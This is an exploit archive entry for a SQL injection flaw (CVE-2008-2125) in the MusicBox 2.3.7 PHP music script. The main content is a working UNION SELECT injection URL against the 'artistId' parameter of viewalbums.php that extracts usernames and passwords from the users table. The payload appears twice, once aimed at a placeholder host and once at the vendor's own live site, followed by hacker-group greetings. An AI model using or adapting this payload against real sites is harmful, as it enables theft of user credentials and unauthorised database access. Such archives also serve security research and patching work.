EXPLOITS

MusicBox 2.3.7 - 'artistId' SQL Injection

Author: HaCkeR_EgY
type: webapps
platform: php
port: 
date_added: 2008-05-06  
date_updated: 2016-11-28  
verified: 1  
codes: OSVDB-44833;CVE-2008-2125  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5560.txt  

#########################################
#    Rem0te SQL Injection Vulnerability                           #
#       Musicbox [viewalbums.php]                                 #
########################################

[<>]Author: HaCkeR-EgY

[<>]H^0mE: www.pal-hacker.com ,  atsdp.com

[<>]CONTact: hacker_EGY@hotmail.com
===========================================================
[<>]Script : Musicbox

[<>]version : Version 2.3.6 / 2.3.7

[<>]Script Price: Only $ 255.00

[<>]Download : www.musicboxv2.com
============================================================

[<>] D0RK : ... you know

[<>] ExPLO!t :

  ===>
http://www.target.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*


[<>] live DemO :

  ===>
  http://www.musicboxv2.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*

==============================================================
[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "

[<>] Greetz : F!resell , Mohamed el Arab ,Mr.EXE , DaRk MaStEr ,H-T Team
                   Gold_M , V4 Team , Jiki Team  , RoMaNcYxHaCkEr
===============================================================

# milw0rm.com [2008-05-07]